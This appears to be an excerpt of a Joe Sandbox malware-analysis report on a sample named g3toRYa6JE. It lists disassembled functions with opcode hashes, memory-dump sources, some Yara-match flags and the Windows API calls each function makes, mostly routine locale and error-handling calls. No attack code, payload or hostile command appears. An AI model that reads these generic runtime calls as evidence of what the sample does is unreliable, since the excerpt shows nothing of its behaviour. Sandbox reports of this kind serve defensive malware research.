                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                              • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                              • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                              • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00782622
                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 007827C0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4264772764-0
                                                                                                                                                                                                                              • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                              • Instruction ID: 00514ae6464b7da973880e5f294635e346aab3d6a7a6f5b9b6979ae8456717c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56410C25A64380A5E730FFA1BC45B2533B0FF64722F10652AE524CB2B2E3A28545C75E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                              • Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007B6F11,?,?,00000008,?,?,007BF3D2,00000000), ref: 007B7143
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                              • Instruction ID: 20ec408d40621b92f33859c778ef3b11e379d4095e4a925d2b631fc1b73fcfe2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07B15C31214609DFD719CF2CC48ABA57BE0FF85364F258659E999CF2A1C33AE991CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2955987475-0
                                                                                                                                                                                                                              • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                                                                                                                                              • Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2190
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B219D
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BB8F0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2955987475-0
                                                                                                                                                                                                                              • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                              • Instruction ID: 2f093857856ec8d203088089cd15453eb09dcd19731c0ecec4e86d2be00fa680
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB21807255420AEBDF249E24DC86BFA77ACEB44710F10017AFE01D6241EBBDAE44CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2016158738-0
                                                                                                                                                                                                                              • Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                                                                                                                                              • Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,007B0A0C,?,007BBC79,00000000,?,?,?), ref: 007BB596
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2016158738-0
                                                                                                                                                                                                                              • Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                                                                                                                                              • Instruction ID: a7688b0d1a9beb0c190445934bf896fbd62ca92b21b80970afc90404596a2e37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3611253B2047059FDB289F38C8A17BABB92FF80358B14442DEE4687B40D7B5A943CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 787680540-0
                                                                                                                                                                                                                              • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                              • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2190
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B219D
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BB8F0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2955987475-0
                                                                                                                                                                                                                              • Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                              • Instruction ID: 7427a25b0c6953a7afc756658f943ce49879a3f2ab10c6913236f8bfa0a315f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55012632B45219EBCB04AF34DC85AFA33A8DF09710F0041BAEF02DB282DB79AD018750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007BB86A,00000000,00000000,?), ref: 007BBAF8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 787680540-0
                                                                                                                                                                                                                              • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                              • Instruction ID: 209c6e2c67ddbf037973cd154d589fddf32a29b4d9ad5ffe7523315abfd40745
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF02872A04119BBDB289F24CC0ABFB7768EB40714F044429ED46A3144EBB8FD02C6D0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2016158738-0
                                                                                                                                                                                                                              • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                              • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,007B0A0C,?,007BBC3D,007B0A0C,?,?,?,?,?,007B0A0C,?,?), ref: 007BB60B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2016158738-0
                                                                                                                                                                                                                              • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                              • Instruction ID: a850dfaff8002e70e556b6adb18f174b56b6f711ddf1bcae37a7344c81f66541
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0F0363007086FDB255F399C85BBABB95EF8076CF15442DFE068B691E7B9AC028744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,007B046A,?,00000004), ref: 007B546A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                              • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                              • Instruction ID: ef2c0590df8a2bd0d9ed119117b612d93ffddfc8212b2ee9d84bc355af174443
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBF02B31680318FBDB016F70DC06FAE7B21EF04B12F104055FD0566190DA758D20A689
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                                                                                                                                              • Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007AE644: RtlEnterCriticalSection.NTDLL(00330DA5), ref: 007AE653
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 007B505C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                                                                                                                                              • Instruction ID: 657523f000009ef6255c3cfdb06a938030edeb342b82ad9d169a8d67f997bbf0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F04F32A20304DFEB10EF68D90AB8D77E0AF45721F104266F900DB2E2C7799940CB49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2016158738-0
                                                                                                                                                                                                                              • Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                                                                                                                                              • Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,007BBC9B,007B0A0C,?,?,?,?,?,007B0A0C,?,?,?), ref: 007BB510
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2016158738-0
                                                                                                                                                                                                                              • Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                                                                                                                                              • Instruction ID: 8b8df92c836a3a6303ca586cf3c5ce74edcb50b95fcc0e9b7ace82e09b5b7a74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0553A30020897CB189F39DC057AABF90EFC1750F0A0059EF05CB241C3799843C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
                                                                                                                                                                                                                              Memory Dump Source
